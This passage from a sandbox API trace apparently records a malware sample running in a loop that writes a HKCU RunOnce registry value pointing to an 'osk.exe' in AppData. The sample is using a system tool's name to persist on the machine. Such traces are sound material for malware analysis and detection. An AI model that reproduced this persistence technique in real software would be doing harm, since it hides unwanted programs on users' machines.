lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0082.018] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0082.018] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0082.018] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0082.018] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0082.019] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0082.019] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0082.019] RegCloseKey (hKey=0x280) returned 0x0 [0082.019] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.019] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.019] SetTimer (hWnd=0x20280, nIDEvent=0x20d6, uElapse=0xa, lpTimerFunc=0x0) returned 0x20d6 [0082.019] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0082.031] TranslateMessage (lpMsg=0x33f7fc) 
returned 0 [0082.031] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0082.031] KillTimer (hWnd=0x20280, uIDEvent=0x20d6) returned 1 [0082.031] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.031] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0082.031] IUnknown:Release (This=0x787518) returned 0x1 [0082.032] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0082.032] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0082.032] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0082.032] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 
[0082.032] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0082.032] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0082.032] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0082.032] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0082.032] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0082.032] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x5b [0082.032] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0082.032] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x5c [0082.032] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, 
dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0082.033] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x5b [0082.033] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.033] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0082.033] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.034] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.034] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0082.034] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0082.034] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0082.034] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0082.034] 
_mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0082.034] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0082.034] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0082.034] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0082.034] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0082.034] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0082.034] RegCloseKey (hKey=0x280) returned 0x0 [0082.035] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.035] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.035] SetTimer (hWnd=0x20280, nIDEvent=0x20d7, uElapse=0xa, lpTimerFunc=0x0) returned 0x20d7 [0082.035] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0082.046] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0082.046] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0082.046] KillTimer (hWnd=0x20280, uIDEvent=0x20d7) returned 1 [0082.046] 
ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.046] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0082.046] IUnknown:Release (This=0x787518) returned 0x1 [0082.047] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0082.047] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0082.047] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0082.047] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0082.047] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, 
[1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0082.047] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0082.047] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0082.047] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0082.047] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0082.047] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x5c [0082.047] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0082.047] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x5d [0082.047] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, 
wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0082.048] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x5c [0082.048] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.049] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0082.049] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.049] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.049] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0082.049] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0082.049] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0082.049] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0082.049] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0082.049] RegCreateKeyExA (in: hKey=0x80000001, 
lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0082.049] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0082.049] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0082.049] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0082.049] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0082.050] RegCloseKey (hKey=0x280) returned 0x0 [0082.050] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.050] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.050] SetTimer (hWnd=0x20280, nIDEvent=0x20d8, uElapse=0xa, lpTimerFunc=0x0) returned 0x20d8 [0082.050] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0082.061] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0082.061] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0082.062] KillTimer (hWnd=0x20280, uIDEvent=0x20d8) returned 1 [0082.062] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.062] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, 
Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0082.062] IUnknown:Release (This=0x787518) returned 0x1 [0082.062] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0082.062] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0082.062] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0082.063] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0082.063] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 
0x80004002 [0082.063] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0082.063] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0082.063] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0082.063] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0082.063] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x5d [0082.063] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0082.063] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x5e [0082.063] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, 
pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0082.064] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x5d [0082.064] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.064] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0082.064] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.064] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.065] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0082.065] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0082.065] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, 